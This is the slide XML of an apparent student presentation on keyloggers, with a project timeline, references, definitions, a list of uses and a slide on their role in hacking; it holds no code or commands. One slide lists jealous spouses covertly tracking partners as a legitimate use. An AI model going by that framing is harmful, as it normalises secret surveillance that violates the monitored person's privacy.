                        <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="685800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" indent="-342900" algn="ctr">
                        <a:buFont typeface="+mj-lt"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>2 weeks</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Research &amp; References</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="609600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" indent="-342900" algn="ctr">
                        <a:buFont typeface="+mj-lt"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>3 weeks </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                          <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Programming &amp; Development</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45725" marB="45725"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="619018">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" indent="-342900" algn="ctr">
                        <a:buFont typeface="+mj-lt"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>2 weeks</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439" marT="45725" marB="45725"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Century Schoolbook" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>Execution </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"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0" y="0"/>
            <a:ext cx="9144000" cy="914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p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" baseline="-25000" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{235C7611-FE86-440E-8A16-A6A56FD35EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1752600"/>
            <a:ext cx="5638800" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>CEH Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:br>
              <a:rPr lang="en-US" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A0DAB"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.kaspersky.co.in</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A0DAB"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A0DAB"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.learnpython.org  (for python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>lybraries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="202124"/>
              </a:solidFill>
              <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A0DAB"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://docs.python.org/3/library/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A0DAB"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A0DAB"/>
              </a:solidFill>
              <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202124"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://commandwindows.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A0DAB"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A0DAB"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ct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8194" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="304800"/>
            <a:ext cx="8763000" cy="4267200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Bookman Old Style"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a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Outlines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8458200" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="20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Problem Definition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="20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Hardware/ Software requirement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="20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Program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="20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Plan of Action </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="20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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350" algn="l" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2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0" y="0"/>
            <a:ext cx="9144000" cy="10668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nchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="FFFFFF"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-127"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Problem Definition</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="FFFFFF"/>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Bookman Old Style" pitchFamily="18" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190500" y="1295400"/>
            <a:ext cx="8763000" cy="5201424"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitoring of a system or intervention involves the collection of routine data that measures progress toward achieving program objectives. It is used to track changes in program outputs and performance over time. It provides regular feedback and early indications of progress (or lack of progress).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keylogging-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      The term ‘keylogger’ itself is neutral, and the word describes the program’s function. It define a keylogger as a software program designed to secretly monitor and log all keystrokes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>      A keylogger is an insidious form of spyware. You enter sensitive data onto your keyboard, believing nobody is watching. In fact, keylogging software is hard at work logging everything that you type.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       Keylogging aren’t illegal. They do have legitimate, useful applications.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Keylogging goes south and becomes a threat if there is malicious intent. Simply put, if you install a keylogger on a device you own, it is legal. If a keylogger is installed behind the back of the actual owner to steal data, it is illegal.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114CA5-57FC-48A3-8F67-BC3546B20923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266700" y="612844"/>
            <a:ext cx="8610600" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="464A4F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="SophosSans-Light"/>
              </a:rPr>
              <a:t>Applications of keylogging-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" i="0" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="464A4F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="SophosSans-Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>Parental control: parents can track what their children do on the Internet, and can opt to be notified if there are any attempts to access websites containing adult or otherwise inappropriate content;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>Jealous spouses or partners can use a keylogger to track the actions of their better half on the Internet if they suspect them of “virtual cheating”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>Company security: tracking the use of computers for non-work-related purposes, or the use of workstations after hours;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>Company security: using keyloggers to track the input of key words and phrases associated with commercial information which could damage the company (materially or otherwise) if disclosed;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>Other security (e.g. law enforcement): using keylogger records to analyze and track incidents linked to the use of personal computers;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="464A4F"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="SophosSans-Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73396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92F89C-DAA3-494A-BD01-08F80420CAA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="381000"/>
            <a:ext cx="8839200" cy="6186309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0">
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>Keylogging in Hacking-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
              <a:t>	Unlike other types of malicious program, keyloggers present no threat to the system itself. Nevertheless, they can pose a serious threat to users, as they can be used to intercept passwords and other confidential information entered via the keyboard. As a result, cyber criminals can get PIN codes and account numbers for e-payment systems, passwords to online gaming accounts, email addresses, user names, email passwords etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="KasperskySans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="KasperskySans"/>
              </a:rPr>
